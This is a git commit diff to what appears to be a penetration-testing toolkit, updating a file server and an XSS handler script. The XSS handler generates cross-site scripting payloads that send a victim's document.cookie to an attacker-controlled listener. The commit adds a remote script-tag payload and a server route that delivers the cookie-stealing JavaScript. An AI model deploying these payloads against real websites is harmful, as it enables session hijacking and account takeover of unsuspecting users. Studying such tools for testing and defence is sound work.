xss_handler + fileserver update

This commit is contained in:
Roman Hergenreder 2021-05-07 23:52:08 +02:00
parent eadff755a0
commit 494a1e0f4b
2 changed files with 15 additions and 4 deletions

@ -50,6 +50,7 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
body = self.rfile.read(int(contentLength)) body = self.rfile.read(int(contentLength))
print("==========") print("==========")
print("%s %s %s" % (self.command, self.path, self.request_version))
print(str(self.headers).strip()) print(str(self.headers).strip())
if body: if body:
print() print()

@ -6,11 +6,16 @@ import http.server
import socketserver import socketserver
from http.server import HTTPServer, BaseHTTPRequestHandler from http.server import HTTPServer, BaseHTTPRequestHandler
def getCookieAddress(address, port): # returns http address
def getServerAddress(address, port):
if port == 80: if port == 80:
return "'http://%s/?x='+document.cookie" % address return "http://%s" % address
else: else:
return "'http://%s:%d/?x='+document.cookie" % (address, port) return "http://%s:%d" % (address, port)
# returns js code: 'http://xxxx:yy/?x='+document.cookie
def getCookieAddress(address, port):
return "'%s/?x='+document.cookie" % getServerAddress(address, port)
def generatePayload(type, address, port): def generatePayload(type, address, port):
@ -23,6 +28,7 @@ def generatePayload(type, address, port):
if type == "script": if type == "script":
payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress) payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
payloads.append('<script src="%s/xss" />' % getServerAddress(address, port))
if len(payloads) == 0: if len(payloads) == 0:
return None return None
@ -41,7 +47,11 @@ class XssServer(BaseHTTPRequestHandler):
def do_GET(self): def do_GET(self):
self._set_headers() self._set_headers()
self.wfile.write(self._html()) if self.path == "/xss":
cookie_addr = getCookieAddress(util.getAddress(), listen_port)
self.wfile.write(cookie_addr.encode())
else:
self.wfile.write(self._html())
def do_HEAD(self): def do_HEAD(self):
self._set_headers() self._set_headers()